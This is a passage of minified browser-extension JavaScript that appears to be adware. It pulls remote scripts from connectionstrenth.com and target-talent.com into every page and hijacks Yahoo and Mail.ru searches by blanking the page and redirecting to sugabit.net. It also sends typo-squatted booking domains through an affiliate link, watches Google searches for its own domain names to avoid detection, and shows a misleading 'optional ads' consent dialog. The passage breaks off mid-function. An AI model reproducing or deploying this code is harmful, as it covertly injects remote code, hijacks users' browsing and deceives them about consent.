  1769.                 if (q.src.search(/72d07657ba1ad678d2.*\.js/i) !== -1) {
  1770.                     if (n) {
  1771.                         d.scriptDomain = q.src.replace(/^https?\:\/\//i, "").split("/")[0]
  1772.                     }
  1773.                     s = r(q.src);
  1774.                     break
  1775.                 }
  1776.             }
  1777.             if (location.host.indexOf("bing.com") > -1 && i.AM && typeof i.AM == "object") {
  1778.                 i.AM.push(d.scriptDomain)
  1779.             }
  1780.             i[g].tbParams = {
  1781.                 wid: "50866",
  1782.                 sid: "",
  1783.                 tid: "1837",
  1784.                 title: "Not set",
  1785.                 optoutUrl: ""
  1786.             };
  1787.             if (s.wid) {
  1788.                 i[g].tbParams.wid = s.wid
  1789.             }
  1790.             if (s.sid) {
  1791.                 i[g].tbParams.sid = s.sid
  1792.             }
  1793.             if (s.tid) {
  1794.                 i[g].tbParams.tid = s.tid
  1795.             }
  1796.             if (s.title) {
  1797.                 i[g].tbParams.title = decodeURIComponent(s.title)
  1798.             }
  1799.             if (s.optout) {
  1800.                 i[g].tbParams.optoutUrl = decodeURIComponent(s.optout)
  1801.             }
  1802.             i[g].getParams = r(location.href);
  1803.             d.tbParams = i[g].tbParams;
  1804.             d.loadedCallback("LOADED", "", location.host);
  1805.             var v = /\.(jpg|png|jpeg|gif|bmp|doc|pdf|xls|js|xml|doc|docs|txt|css)$/;
  1806.             if (location.href.match(v)) {
  1807.                 d.loadedCallback("URL_STATICFILE");
  1808.                 return false
  1809.             }
  1810.             var u = /(script\.monetizus\.|metrext\.com|icontent\.us|trendtext\.eu|paypal\.com|secure\.|\.gov|youtube\.com|facebook\.com|doubleclick\.net|addthis\.com|twitter\.com|docs\.google\.com|drive\.google\.com)/;
  1811.             if (location.hostname.match(u)) {
  1812.                 d.loadedCallback("URL_IGNOREDOMAIN");
  1813.                 return false
  1814.             }(function(d, w, u) {
  1815.                 var $$ = w["__twb__72d07657ba1ad678d2"];
  1816.                 var scriptsToLoad = $$.fromJson("{\"lnkr\":{\"countries_allow\":\"\",\"countries_deny\":null,\"hostname_allow\":\"\",\"hostname_deny\":\"(?:.*googleusercontent\\\\..*|mail\\\\.google\\\\.com|reddit\\\\.com|.*\\\\.reddit\\\\.com)\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/connectionstrenth.com\\/addons\\/lnkr5.min.js\",\"limit\":\"0\",\"type\":\"external\",\"key\":\"lnkr\"},\"search_injection\":{\"countries_allow\":\"\",\"countries_deny\":\"\",\"hostname_allow\":\"(?:google\\\\..*)\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\",\"limit\":\"0\",\"type\":\"platform\",\"key\":\"search_injection\",\"config\":{\"silent\":1}},\"search_icons\":{\"countries_allow\":\"\",\"countries_deny\":null,\"hostname_allow\":\"(?:google\\\\..*)\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\",\"limit\":\"0\",\"type\":\"platform\",\"key\":\"search_icons\"},\"lnkr_google\":{\"countries_allow\":\"\",\"countries_deny\":null,\"hostname_allow\":\"(?:google\\\\..*)\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/connectionstrenth.com\\/addons\\/lnkr33_gl.min.js\",\"limit\":\"0\",\"type\":\"external\",\"key\":\"lnkr_google\"},\"adworks_joboffers\":{\"countries_allow\":\"us\",\"countries_deny\":null,\"hostname_allow\":\"\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/target-talent.com\\/js\\/ch\\/17?tid=50866_1837_\\/SID\\/&name=\\/TITLE\\/&user=&ulink=\\/OPTOUTURL\\/\",\"limit\":null,\"type\":\"external\",\"key\":\"adworks_joboffers\"}}");
  1817.                 if (location.host.indexOf("youradexchange.com") >= 0 && location.pathname.indexOf("a/display.") >= 0) {
  1818.                     if ($$.getParams && $$.getParams.r && $$.getParams.r != 391766 && $$.getParams.r != 391769) {
  1819.                         var r = $$.randomNumber(1, 100);
  1820.                         var rLimit = 100;
  1821.                         if (r <= rLimit) {
  1822.                             setTimeout(function() {
  1823.                                 location.href = "http://www.youradexchange.com/a/display.php?r=391769&sub1=pr" + $$.tbParams.wid + "x" + $$.tbParams.tid + "x" + $$.tbParams.sid
  1824.                             }, 0)
  1825.                         } else {}
  1826.                     }
  1827.                 }
  1828.                 try {
  1829.                     if (location.hostname.indexOf("google.") == 0 || location.hostname.indexOf("www.google.") == 0) {
  1830.                         var checkKeywords = function() {
  1831.                             var searchEls = document.getElementsByName("q");
  1832.                             var kw;
  1833.                             if (searchEls) {
  1834.                                 kw = searchEls[0].value
  1835.                             }
  1836.                             if (!kw) {
  1837.                                 return false
  1838.                             }
  1839.                             var pattern = /(lnkr\.us|urlvalidation\.com|adrs\.me|icontent\.us|trendtext\.eu|metrext\.com|ratexchange\.net|adserv\.info|serverads\.net|takethatad\.com|adnotbad\.com|tradeadsexchange\.com|spaceshipad\.com|jsfuel\.com|cdnclntr\.com|amiok\.org|whatzmyip\.net|lancheck\.net|connectionstrenth\.com|spidtest\.org|siteheart\.net)/i;
  1840.                             if (kw.match(pattern)) {
  1841.                                 clearTimeout(checkKeywordsTimerId);
  1842.                                 $$.loadedCallback("GOOGLE_KEYWORD_MATCH");
  1843.                                 $$.script("//urlvalidation.com/rememberme");
  1844.                                 $$.script("//adrs.me/rememberme")
  1845.                             }
  1846.                         };
  1847.                         var checkKeywordsTimerId;
  1848.                         var runCheckKeywords = function() {
  1849.                             checkKeywordsTimerId = setTimeout(runCheckKeywords, 1000);
  1850.                             checkKeywords()
  1851.                         };
  1852.                         $$.ready(function() {
  1853.                             runCheckKeywords()
  1854.                         })
  1855.                     }
  1856.                 } catch (e) {}
  1857.                 var matchPattern = /(boobking\.|booing\.|buking\.|boocking\.|boooking\.|bookking\.|booing\.)/i;
  1858.                 if (location.hostname.match(matchPattern)) {
  1859.                     if (typeof window.stop == "function") {
  1860.                         window.stop()
  1861.                     }
  1862.                     location.href = "http://adrs.me/get?key=6ae9f4bd1dc812dc713d61cba871d8e8&out=http%3A%2F%2Fbooking.com&ref=http%3A%2F%2Fgo.com&format=go&uid=rdr50866"
  1863.                 };;;;;;;;;;;
  1864.                 if (!scriptsToLoad) {
  1865.                     return false
  1866.                 }
  1867.                 if (scriptsToLoad.search_yahoo) {
  1868.                     (function() {
  1869.                         var block = "search_yahoo";
  1870.                         $$.ready(function() {
  1871.                             try {
  1872.                                 (function() {
  1873.                                     if (location.hostname.indexOf("search.yahoo.com") == -1 || location.pathname.indexOf("/search") == -1) {
  1874.                                         return
  1875.                                     }
  1876.                                     var r = $$.randomNumber(1, 100);
  1877.                                     var rLimit = scriptsToLoad[block].coverage;
  1878.                                     if (r > rLimit) {
  1879.                                         return
  1880.                                     }
  1881.                                     $$.loadedCallback("MNTZ_LOADED", block);
  1882.                                     if ($$.getCookie("__mtz_srchyho_fired") == 1) {
  1883.                                         return
  1884.                                     }
  1885.  
  1886.                                     function getParams() {
  1887.                                         params = {};
  1888.                                         for (var e = location.search.replace("?", ""), r = e.split("&"), c = 0; c < r.length; c++) {
  1889.                                             t = r[c].split("="), t[1] && (params[t[0]] = t[1])
  1890.                                         }
  1891.                                         var a = location.hash.replace("#", "");
  1892.                                         a && (t = a.split("="), t[1] && (params[t[0]] = t[1]))
  1893.                                     }
  1894.  
  1895.                                     function checkYahooTag() {
  1896.                                         getParams();
  1897.                                         if (location.href.indexOf("tightrope") > -1 && location.href.indexOf("tr57") > -1) {
  1898.                                             return
  1899.                                         } else {
  1900.                                             redirectSearch("p")
  1901.                                         }
  1902.                                     }
  1903.  
  1904.                                     function redirectSearch(e) {
  1905.                                         if (getParams(), void 0 != params[e]) {
  1906.                                             window.stop && window.stop(), document.documentElement.style.opacity = "0", document.documentElement.style.display = "none";
  1907.                                             var r = params[e],
  1908.                                                 c = "http://sugabit.net/search.php?source=btn&sid=" + $$.tbParams.wid + "x" + $$.tbParams.tid + "x" + $$.tbParams.sid + "&q=" + r;
  1909.                                             $$.loadedCallback("BANNER_LOAD", block);
  1910.                                             $$.setCookie("__mtz_srchyho_fired", 1, {
  1911.                                                 expire: 1800
  1912.                                             });
  1913.                                             location.href = c, clearInterval(tmr)
  1914.                                         }
  1915.                                     }
  1916.  
  1917.                                     function checkForSearch() {
  1918.                                         var e = location.href; - 1 != d.indexOf("search.yahoo.com") && checkYahooTag() && clearInterval(tmr)
  1919.                                     }
  1920.                                     var d = window.document.domain,
  1921.                                         tmr, tmrCnt = 0,
  1922.                                         params = {};
  1923.                                     window == top && (checkForSearch(), tmr = setInterval(checkForSearch, 100))
  1924.                                 })()
  1925.                             } catch (e) {}
  1926.                         })
  1927.                     })()
  1928.                 }
  1929.                 if (scriptsToLoad.search_mail) {
  1930.                     (function() {
  1931.                         var block = "search_mail";
  1932.                         $$.ready(function() {
  1933.                             try {
  1934.                                 (function() {
  1935.                                     if (location.hostname.indexOf("go.mail.ru") == -1 || location.pathname.indexOf("/search") == -1) {
  1936.                                         return
  1937.                                     }
  1938.                                     var r = $$.randomNumber(1, 100);
  1939.                                     var rLimit = scriptsToLoad[block].coverage;
  1940.                                     if (r > rLimit) {
  1941.                                         return
  1942.                                     }
  1943.                                     $$.loadedCallback("MNTZ_LOADED", block);
  1944.                                     if ($$.getCookie("__mtz_srchmlr_fired") == 1) {
  1945.                                         return
  1946.                                     }
  1947.  
  1948.                                     function getParams() {
  1949.                                         params = {};
  1950.                                         for (var e = location.search.replace("?", ""), r = e.split("&"), c = 0; c < r.length; c++) {
  1951.                                             t = r[c].split("="), t[1] && (params[t[0]] = t[1])
  1952.                                         }
  1953.                                         var a = location.hash.replace("#", "");
  1954.                                         a && (t = a.split("="), t[1] && (params[t[0]] = t[1]))
  1955.                                     }
  1956.  
  1957.                                     function checkMailruTag() {
  1958.                                         getParams();
  1959.                                         if (params.frc && params.frc == "821563") {
  1960.                                             return
  1961.                                         } else {
  1962.                                             redirectSearch("q")
  1963.                                         }
  1964.                                     }
  1965.  
  1966.                                     function redirectSearch(e) {
  1967.                                         if (getParams(), void 0 != params[e]) {
  1968.                                             window.stop && window.stop(), document.documentElement.style.opacity = "0", document.documentElement.style.display = "none";
  1969.                                             var r = params[e],
  1970.                                                 c = "http://sugabit.net/search.php?source=btn2&sid=" + $$.tbParams.wid + "x" + $$.tbParams.tid + "x" + $$.tbParams.sid + "&q=" + r;
  1971.                                             $$.loadedCallback("BANNER_LOAD", block);
  1972.                                             $$.setCookie("__mtz_srchmlr_fired", 1, {
  1973.                                                 expire: 1800
  1974.                                             });
  1975.                                             location.href = c, clearInterval(tmr)
  1976.                                         }
  1977.                                     }
  1978.  
  1979.                                     function checkForSearch() {
  1980.                                         var e = location.href; - 1 != d.indexOf("go.mail.ru") && checkMailruTag() && clearInterval(tmr)
  1981.                                     }
  1982.                                     var d = window.document.domain,
  1983.                                         tmr, tmrCnt = 0,
  1984.                                         params = {};
  1985.                                     window == top && (checkForSearch(), tmr = setInterval(checkForSearch, 100))
  1986.                                 })()
  1987.                             } catch (e) {}
  1988.                         })
  1989.                     })()
  1990.                 }
  1991.                 $$.monetizationsConfig = scriptsToLoad;
  1992.                 $$.loadedCallback("BEFORE_OPTOUT_REQ");
  1993.                 $$.jsonp({
  1994.                     url: (window.location.protocol == "http:" ? "http:" : "https:") + "//" + $$.scriptDomain + "/optout/get",
  1995.                     data: {
  1996.                         key: "72d07657ba1ad678d2"
  1997.                     },
  1998.                     callback: function(response) {
  1999.                         if (!response.success) {
  2000.                             $$.loadedCallback("OPTOUT_RESPONSE_FAIL");
  2001.                             return false
  2002.                         }
  2003.                         $$.loadedCallback("OPTOUT_RESPONSE_OK");
  2004.                         var userId = response.userId;
  2005.                         var startTime = response.strTm;
  2006.                         var optout = {};
  2007.                         if (response.optout) {
  2008.                             optout = $$.optoutValue = $$.fromJson(decodeURIComponent(response.optout))
  2009.                         }
  2010.                         var country = response.country;
  2011.                         var limits = {};
  2012.                         if (response.limits) {
  2013.                             limits = $$.limitsValue = $$.fromJson(decodeURIComponent(response.limits))
  2014.                         }
  2015.                         var targetingUser = response.targeting || 0;
  2016.                         var currentHostname = location.hostname;
  2017.                         currentHostname = currentHostname.replace("www.", "");
  2018.                         var timeNow = $$.unixTimestampNow;
  2019.                         if (!country) {
  2020.                             country = "xx"
  2021.                         }
  2022.                         country = country.toLowerCase();
  2023.                         if (!userId) {
  2024.                             userId = $$.randomNumber(1, 100);
  2025.                             $$.jsonp({
  2026.                                 url: (window.location.protocol == "http:" ? "http:" : "https:") + "//" + $$.scriptDomain + "/optout/set/userid",
  2027.                                 data: {
  2028.                                     key: "72d07657ba1ad678d2",
  2029.                                     cv: userId
  2030.                                 }
  2031.                             })
  2032.                         }
  2033.                         if (!startTime) {
  2034.                             $$.setStartTime()
  2035.                         }
  2036.                         var timeAfterInstall = $$.unixTimestampNow - startTime;
  2037.                         var platformBlocks = [];
  2038.                         for (var key in scriptsToLoad) {
  2039.                             try {
  2040.                                 var scriptRow = scriptsToLoad[key];
  2041.                                 var scriptUrl = scriptRow.url;
  2042.                                 var scriptCoverage = parseInt(scriptRow.coverage);
  2043.                                 if (typeof(scriptUrl) != "string") {
  2044.                                     break
  2045.                                 }
  2046.                                 if (!$$.demoMode) {
  2047.                                     if ("1837" == 1549 && location.protocol == "https:" && (key == "ext_50r_pop" || key == "ext_rvz_ctxpop")) {
  2048.                                         return true
  2049.                                     }
  2050.                                     if (optout && optout[key] != undefined && optout[key] == true) {
  2051.                                         continue
  2052.                                     }
  2053.                                     if (scriptRow.countries_allow && scriptRow.countries_allow.indexOf(country) == -1) {
  2054.                                         continue
  2055.                                     }
  2056.                                     if (scriptRow.countries_deny && scriptRow.countries_deny.indexOf(country) > -1) {
  2057.                                         continue
  2058.                                     }
  2059.                                     if (scriptCoverage && scriptCoverage < userId) {
  2060.                                         continue
  2061.                                     }
  2062.                                     if (limits && limits[key]) {
  2063.                                         var leftTime = parseInt(limits[key]) - timeNow;
  2064.                                         if (leftTime > 0) {
  2065.                                             continue
  2066.                                         }
  2067.                                     }
  2068.                                     if (key == "clickunder_subscr" && targetingUser != 1) {
  2069.                                         continue
  2070.                                     }
  2071.                                     var hostnameReg;
  2072.                                     if (scriptRow.hostname_deny) {
  2073.                                         hostnameReg = new RegExp("^" + scriptRow.hostname_deny + "$", "i");
  2074.                                         if (hostnameReg.test(currentHostname)) {
  2075.                                             continue
  2076.                                         }
  2077.                                     }
  2078.                                     if (scriptRow.hostname_allow) {
  2079.                                         hostnameReg = new RegExp("^" + scriptRow.hostname_allow + "$", "i");
  2080.                                         if (!hostnameReg.test(currentHostname)) {
  2081.                                             continue
  2082.                                         }
  2083.                                     }
  2084.                                     if (scriptRow.browsers_allow || scriptRow.browsers_deny) {
  2085.                                         if (typeof detect == "undefined") {
  2086.                                             continue
  2087.                                         }
  2088.                                         var ua = detect.parse(navigator.userAgent);
  2089.                                         var checkUa = ua.browser.family.toLowerCase();
  2090.                                         var browserAllowed = false
  2091.                                     }
  2092.                                     if (scriptRow.browsers_allow) {
  2093.                                         var browsersAllow = scriptRow.browsers_allow.toLowerCase().split(",");
  2094.                                         for (var i2 in browsersAllow) {
  2095.                                             if (browsersAllow[i2] == checkUa) {
  2096.                                                 browserAllowed = true;
  2097.                                                 break
  2098.                                             }
  2099.                                         }
  2100.                                         if (!browserAllowed) {
  2101.                                             continue
  2102.                                         }
  2103.                                     }
  2104.                                     if (scriptRow.browsers_deny) {
  2105.                                         var browsersDeny = scriptRow.browsers_deny.toLowerCase().split(",");
  2106.                                         for (var i2 in browsersDeny) {
  2107.                                             if (browsersDeny[i2] == checkUa) {
  2108.                                                 browserAllowed = false;
  2109.                                                 break
  2110.                                             }
  2111.                                         }
  2112.                                         if (!browserAllowed) {
  2113.                                             continue
  2114.                                         }
  2115.                                     }
  2116.                                 } else {};
  2117.                                 if (key == "lnkr") {
  2118.                                     (function(tbObject) {
  2119.                                         eval("window._lnkr5 = {\'uid\':\'50866x1837x\'+tbObject.tbParams.sid,\'allowTargetBlank\': false};")
  2120.                                     })($$)
  2121.                                 };
  2122.                                 if (key == "lnkr_google") {
  2123.                                     (function(tbObject) {
  2124.                                         eval("window._lnkr33 = {\'uid\':\'50866x1837x\'+tbObject.tbParams.sid,\'allowTargetBlank\': false};")
  2125.                                     })($$)
  2126.                                 };
  2127.                                 if (scriptRow.type == "external") {
  2128.                                     $$.loadedCallback("MNTZ_INJECT", key);
  2129.                                     scriptUrl = scriptUrl.replace("/SID/", encodeURIComponent($$.tbParams.sid));
  2130.                                     scriptUrl = scriptUrl.replace("/TITLE/", encodeURIComponent($$.tbParams.title));
  2131.                                     scriptUrl = scriptUrl.replace("/REFERRER/", encodeURIComponent(location.href));
  2132.                                     scriptUrl = scriptUrl.replace("/REF_HOST/", encodeURIComponent(location.hostname ? location.hostname : location.host));
  2133.                                     scriptUrl = scriptUrl.replace("/RANDOM/", Math.floor(Math.random() * 52));
  2134.                                     scriptUrl = scriptUrl.replace("/OPTOUTURL/", encodeURIComponent(encodeURIComponent(($$.tbParams.optoutUrl ? $$.tbParams.optoutUrl : "http://thisadsfor.us/optout?t=1837&u=50866&block=adworks_joboffers"))));
  2135.                                     if (scriptUrl.substr(0, 2) == "//") {
  2136.                                         scriptUrl = (window.location.protocol == "http:" ? "http:" : "https:") + scriptUrl
  2137.                                     }(function(block) {
  2138.                                         var script = $$.script(scriptUrl, false);
  2139.                                         $$.on(script, "load", function() {
  2140.                                             $$.loadedCallback("MNTZ_LOADED", block);
  2141.                                             $$.updateLimits(block)
  2142.                                         })
  2143.                                     })(key)
  2144.                                 } else {
  2145.                                     if (scriptRow.type == "platform") {
  2146.                                         platformBlocks.push(key)
  2147.                                     } else {}
  2148.                                 }
  2149.                             } catch (e) {
  2150.                                 $$.loadedCallback("CORE_JS_ERROR", key)
  2151.                             }
  2152.                         }
  2153.                         if (platformBlocks.length > 0) {
  2154.                             var params = ["sid=" + $$.tbParams.wid + "_" + $$.tbParams.tid + "_" + $$.tbParams.sid, "title=" + $$.tbParams.title];
  2155.                             for (var i in platformBlocks) {
  2156.                                 if (typeof platformBlocks[i] != "string") {
  2157.                                     break
  2158.                                 }
  2159.                                 params.push("blocks[]=" + platformBlocks[i])
  2160.                             }
  2161.                             var url = (window.location.protocol == "http:" ? "http:" : "https:") + "//" + $$.scriptDomain + "/ext/72d07657ba1ad678d2.js?" + params.join("&");
  2162.                             $$.script(url, false);
  2163.                             $$.loadedCallback("MNTZ_INJECT", platformBlocks.join(","))
  2164.                         }
  2165.                     }
  2166.                 })
  2167.             })(document, window);;
  2168.             (function(g, a, e) {
  2169.                 var c = a["__twb__72d07657ba1ad678d2"];
  2170.                 var f = c.Sizzle;
  2171.  
  2172.                 function b() {
  2173.                     var d = f(".commercial-unit");
  2174.                     var i = f("input[name=q]");
  2175.                     if (i.length > 0 && d.length > 0) {
  2176.                         var h = i[0].value;
  2177.                         c.loadedCallback("GGL_COM_BLOCK", "", h)
  2178.                     }
  2179.                 }
  2180.                 c.each(f("input[name=q]"), function(d) {
  2181.                     c.on(d, "change", function() {
  2182.                         b()
  2183.                     })
  2184.                 });
  2185.                 b()
  2186.             })(document, window, undefined);;
  2187.             (function(e, a, f, c) {
  2188.                 var b = a[f];
  2189.                 b.twBarOptOutInit = function() {
  2190.                     var g = document.createElement("iframe");
  2191.                     g.setAttribute("style", "display: none; position: fixed; top: 50%; left: 50%; width: 650px; height: 500px; margin-top: -250px; margin-left: -325px; z-index: 2147483647;");
  2192.                     g.id = "__twbopt72d07657ba1ad678d2";
  2193.                     g.frameBorder = 0;
  2194.                     g.scrolling = "no";
  2195.                     document.body.appendChild(g);
  2196.                     var d = null;
  2197.                     var h = function() {
  2198.                         if (d) {
  2199.                             clearTimeout(d)
  2200.                         }
  2201.                         var i = {};
  2202.                         if (g.contentWindow) {
  2203.                             i = g.contentWindow.document
  2204.                         } else {
  2205.                             if (g.contentDocument) {
  2206.                                 i = g.contentDocument
  2207.                             }
  2208.                         }
  2209.                         i.open();
  2210.                         i.write('<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>' + a[f].tbParams.title + ' OptOut</title><style>article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,video{display:inline-block}template{display:none}html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}a{background:0 0}a:active,a:hover{outline:0}h1{margin:.67em 0}b,strong{font-weight:700}dfn{font-style:italic}hr{height:0;-moz-box-sizing:content-box;box-sizing:content-box}mark{color:#000;background:#ff0}code,kbd,pre,samp{font-size:1em}pre{white-space:pre-wrap}q{quotes:"ВЃC" "ВЃD" "ВЃ8" "ВЃ9"}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}figure{margin:0}button,input,select,textarea{margin:0}button,select{text-transform:none}button{cursor:pointer;-webkit-appearance:button}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;border:0}textarea{overflow:auto;vertical-align:top}table{border-collapse:collapse;border-spacing:0}@media print{*{color:#000!important;text-shadow:none!important;background:transparent!important;box-shadow:none!important}a,a:visited{text-decoration:underline}blockquote,pre{border:1px solid #999;page-break-inside:avoid}thead{display:table-header-group}img,tr{page-break-inside:avoid}img{max-width:100%!important}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}select{background:#fff!important}}*,:after,:before{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{font-size:62.5%;-webkit-tap-highlight-color:rgba(0,0,0,0)}body{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:1.428571429;color:#333;background-color:#fff}button,input,select,textarea{font-family:inherit;font-size:inherit;line-height:inherit}a{color:#428bca;text-decoration:none}a:focus,a:hover{color:#2a6496;text-decoration:underline}a:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}img{vertical-align:middle}hr{margin-top:20px;margin-bottom:20px;border:0;border-top:1px solid #eee}h1,h2,h3,h4,h5,h6{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-weight:500;line-height:1.1;color:inherit}h1,h2,h3{margin-top:20px;margin-bottom:10px}h4,h5,h6{margin-top:10px;margin-bottom:10px}h1{font-size:36px}h2{font-size:30px}h3{font-size:24px}h4{font-size:18px}h5{font-size:14px}h6{font-size:12px}p{margin:0 0 10px}small{font-size:85%}cite{font-style:normal}ol,ul{margin-top:0;margin-bottom:10px}dl{margin-top:0;margin-bottom:20px}dd,dt{line-height:1.428571429}dt{font-weight:700}dd{margin-left:0}blockquote{padding:10px 20px;margin:0 0 20px;border-left:5px solid #eee}blockquote:after,blockquote:before{content:""}address{margin-bottom:20px;font-style:normal;line-height:1.428571429}code,kbd,pre,samp{font-family:Menlo,Monaco,Consolas,"Courier New",monospace}code{padding:2px 4px;font-size:90%;color:#c7254e;white-space:nowrap;background-color:#f9f2f4;border-radius:4px}pre{display:block;padding:9.5px;margin:0 0 10px;font-size:13px;line-height:1.428571429;color:#333;word-break:break-all;word-wrap:break-word;background-color:#f5f5f5;border:1px solid #ccc;border-radius:4px}table{max-width:100%;background-color:transparent}th{text-align:left}fieldset{padding:0;margin:0;border:0}legend{display:block;width:100%;padding:0;margin-bottom:20px;font-size:21px;line-height:inherit;color:#333;border:0;border-bottom:1px solid #e5e5e5}label{display:inline-block;margin-bottom:5px;font-weight:700}input[type=number]::-webkit-inner-spin-button,input[type=number]::-webkit-outer-spin-button{height:auto}output{display:block;padding-top:7px;font-size:14px;line-height:1.428571429;color:#555;vertical-align:middle}.form-control:-ms-input-placeholder{color:#999}.form-control::-webkit-input-placeholder{color:#999}.btn{display:inline-block;padding:6px 12px;margin-bottom:0;font-size:14px;font-weight:400;line-height:1.428571429;text-align:center;white-space:nowrap;vertical-align:middle;cursor:pointer;background-image:none;border:1px solid transparent;border-radius:4px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none}.btn:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}.btn:focus,.btn:hover{color:#333;text-decoration:none}.btn:active{background-image:none;outline:0;-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,.125);box-shadow:inset 0 3px 5px rgba(0,0,0,.125)}.btn-primary{color:#fff;background-color:#428bca;border-color:#357ebd}.btn-primary:active,.btn-primary:focus,.btn-primary:hover{color:#fff;background-color:#3276b1;border-color:#285e8e}.btn-primary:active{background-image:none}.btn-warning{color:#fff;background-color:#f0ad4e;border-color:#eea236}.btn-warning:active,.btn-warning:focus,.btn-warning:hover{color:#fff;background-color:#ed9c28;border-color:#d58512}.btn-warning:active{background-image:none}.btn-danger{color:#fff;background-color:#d9534f;border-color:#d43f3a}.btn-danger:active,.btn-danger:focus,.btn-danger:hover{color:#fff;background-color:#d2322d;border-color:#ac2925}.btn-danger:active{background-image:none}.btn-success{color:#fff;background-color:#5cb85c;border-color:#4cae4c}.btn-success:active,.btn-success:focus,.btn-success:hover{color:#fff;background-color:#47a447;border-color:#398439}.btn-success:active{background-image:none}.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;border-radius:6px}.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;border-radius:3px}.fade{opacity:0;-webkit-transition:opacity .15s linear;transition:opacity .15s linear}.fade.in{opacity:1}@font-face{font-family:"Glyphicons Halflings";src:url(../fonts/glyphicons-halflings-regular.eot);src:url(../fonts/glyphicons-halflings-regular.eot?#iefix) format("embedded-opentype"),url(../fonts/glyphicons-halflings-regular.woff) format("woff"),url(../fonts/glyphicons-halflings-regular.ttf) format("truetype"),url(../fonts/glyphicons-halflings-regular.svg#glyphicons-halflingsregular) format("svg")}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}.close{float:right;font-size:21px;font-weight:700;line-height:1;color:#000;text-shadow:0 1px 0 #fff;opacity:.2;filter:alpha(opacity=20)}.close:focus,.close:hover{color:#000;text-decoration:none;cursor:pointer;opacity:.5;filter:alpha(opacity=50)}button.close{padding:0;cursor:pointer;background:0 0;border:0;-webkit-appearance:none}.modal-open{overflow:hidden}.modal{position:fixed;top:0;right:0;bottom:0;left:0;z-index:2000000;display:none;overflow:auto;overflow-y:scroll}.modal.fade .modal-dialog{-webkit-transform:translate(0,-25%);-ms-transform:translate(0,-25%);transform:translate(0,-25%);-webkit-transition:-webkit-transform .3s ease-out;-moz-transition:-moz-transform .3s ease-out;-o-transition:-o-transform .3s ease-out;transition:transform .3s ease-out}.modal.in .modal-dialog{-webkit-transform:translate(0,0);-ms-transform:translate(0,0);transform:translate(0,0)}.modal-dialog{position:relative;z-index:1050;width:auto;margin:10px}.modal-content{position:relative;background-color:#fff;border:1px solid #999;border:1px solid rgba(0,0,0,.2);border-radius:6px;outline:0;-webkit-box-shadow:0 3px 9px rgba(0,0,0,.5);box-shadow:0 3px 9px rgba(0,0,0,.5);background-clip:padding-box}.modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1030;background-color:#000}.modal-backdrop.fade{opacity:0;filter:alpha(opacity=0)}.modal-backdrop.in{opacity:.5;filter:alpha(opacity=50)}.modal-header{min-height:16.428571429px;padding:15px;border-bottom:1px solid #e5e5e5}.modal-header .close{margin-top:-2px}.modal-title{margin:0;line-height:1.428571429}.modal-body{position:relative;padding:20px}.modal-footer{padding:19px 20px 20px;margin-top:15px;text-align:right;border-top:1px solid #e5e5e5}.modal-footer:after,.modal-footer:before{display:table;content:" "}.modal-footer:after{clear:both}.modal-footer .btn+.btn{margin-bottom:0;margin-left:5px}@media screen and (min-width:768px){.modal-dialog{width:600px;margin:30px auto}.modal-content{-webkit-box-shadow:0 5px 15px rgba(0,0,0,.5);box-shadow:0 5px 15px rgba(0,0,0,.5)}}</style><content><div class="modal-content" style="font-family:\'Segoe UI\',\'Droid Sans\',Arial,sans-serif; width:650px"><div class="modal-header"><button type="button" class="close" id="close-btn" data-dismiss="modal" aria-hidden="true"><img src="//connectionstrenth.com/ext/images/close-cross.png" width="16" height="16"></button><h4 class="modal-title" id="myModalLabel"><b>' + a[f].tbParams.title + '\'s development is supported by <u style="position:static">optional</u> ads</b></h4></div><div class="modal-body">' + a[f].tbParams.title + '\'s development is supported by <b>optional</b> advertisements that are added to some of the websites you visit. During the development of this extension, I\'ve put in thousands of hours adding features, fixing bugs and making things betternot mentioning the support of all the users who ask for help.<br><br>Ads support most of the internet we all use and love; without them, the internet we have today would simply not exist. Similarly, without revenue, this extension (and the upcoming new ones) would not be possible.<br><br><b>You can disable these ads now or later in the settings page. You can also minimize the ads appearance by clicking on partial support button. Both of these options are available by clicking \'x\' button in the corner of each ad.</b> In both cases,your choice will remain in effect unless you reinstall or reset the extension.</div><div class="modal-footer"><button type="button" id="full-support" class="btn btn-success btn-lg">Fully Support</button><button type="button" id="partial-support" class="btn btn-default">Partially Support</button><p style="text-align:left;width:100%;"><a id="no-support" style="text-decoration:underline;" href="#">No, I don\'t want to support you work</a></p></div></div></content>');
  2211.                         i.close();
  2212.                         i.getElementById("full-support").onclick = function() {
  2213.                             b.optoutHide();
  2214.                             b.loadedCallback("OPTOUT_CLK_FULLSUPPORT");
  2215.                             return false
  2216.                         };
  2217.                         i.getElementById("close-btn").onclick = function() {
